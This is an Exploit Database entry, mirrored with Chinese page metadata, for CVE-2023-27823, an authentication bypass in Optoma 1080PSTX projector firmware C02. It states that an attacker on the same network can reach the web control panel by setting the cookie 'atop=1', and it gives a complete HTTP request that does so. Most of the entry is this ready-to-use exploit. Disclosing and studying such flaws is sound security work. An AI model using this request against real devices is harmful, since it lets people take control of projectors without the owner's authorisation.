Optoma 1080PSTX Firmware C02 – Authentication Bypass

• Exploit Database
• 117 阅读

• 作者： Anthony Cole
  日期： 2023-05-23
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/51444/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24

  # Exploit Title: Optoma 1080PSTX Firmware C02 - Authentication Bypass # Date: 2023/05/09 # Exploit Author: Anthony Cole # Contact: http://twitter.com/acole76 # Website: http://twitter.com/acole76 # Vendor Homepage: http://optoma.com # Version: Optoma 1080PSTX Firmware C02 # Tested on: N/A # CVE : CVE-2023-27823   Details By default the web interface of the 1080PSTX requires a username and password to access the application control panel.However, an attacker, on the same network, can bypass it by manually setting the "atop" cookie to the value of "1".   GET /index.asp HTTP/1.1 Host: projector Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: atop=1 Connection: close